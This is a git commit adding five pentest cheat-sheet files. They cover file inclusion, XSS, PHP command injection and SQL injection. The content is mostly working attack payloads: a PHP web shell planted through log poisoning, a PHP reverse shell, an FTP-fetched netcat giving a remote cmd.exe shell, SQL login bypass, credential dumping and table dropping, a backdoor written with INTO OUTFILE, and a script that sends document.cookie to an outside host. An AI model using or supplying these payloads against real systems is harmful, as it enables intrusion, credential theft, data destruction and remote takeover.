note updates

master
51x 2017-01-16 21:52:08 +01:00
parent fefa6e6bb7
commit 1ec27c494c
5 changed files with 112 additions and 0 deletions


@ -0,0 +1,41 @@
Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains


@ -0,0 +1,14 @@
XSS locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
XSS locator 2
'';!--"<XSS>=&{()}
<img src="//" onerror=alert(document.cookie);>
Other fuzzing char list
><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}


@ -0,0 +1,11 @@
PHP command injection
=====================
There are just some ideas.
<? system('apt-get install netcat -y'); ?>
<? system('netcat 14.5.1.44 8080'); ?>
<? system('wget http://14.5.1.44:8080/'); ?>
<? system('init 6'); ?>


@ -0,0 +1,43 @@
SQLi notes
==========
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(/etc/passwd) #
x%') and drop table if exists customers #
x%') and create database test #
x%') ; DROP ALL TABLES; #
@@hostname
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'


@ -0,0 +1,3 @@
<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>